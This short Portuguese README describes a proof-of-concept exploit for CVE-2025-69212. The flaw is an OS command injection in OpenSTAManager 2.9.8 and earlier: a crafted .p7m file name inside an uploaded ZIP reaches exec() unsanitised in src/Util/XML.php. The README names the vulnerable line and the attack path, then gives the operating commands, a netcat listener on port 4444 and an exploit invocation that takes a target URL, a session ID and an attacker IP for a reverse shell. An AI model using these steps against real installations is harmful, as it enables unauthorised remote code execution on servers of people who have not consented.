
Prova de conceito de exploit para CVE-2025-69212: injeção de comando do sistema operacional no OpenSTAManager <= 2.9.8 através de nome de arquivo .p7m malicioso no upload de ZIP, permitindo execução remota de código.
OpenSTAManager <= 2.9.8 — Injeção de Comandos do SO através de nome de arquivo .p7m malicioso em upload ZIP.
Arquivo: src/Util/XML.php:100 — $file não sanitizado em exec()
Vetor: /plugins/importFE_ZIP/actions.php → ZIP → nome de arquivo .p7m → exec("openssl smime ... -in \"$file\" ...")
# Listener
nc -lvnp 4444
# Exploit
python3 CVE-2025-69212.py http://target.htb SUA_PHPSESSID 10.10.14.X 4444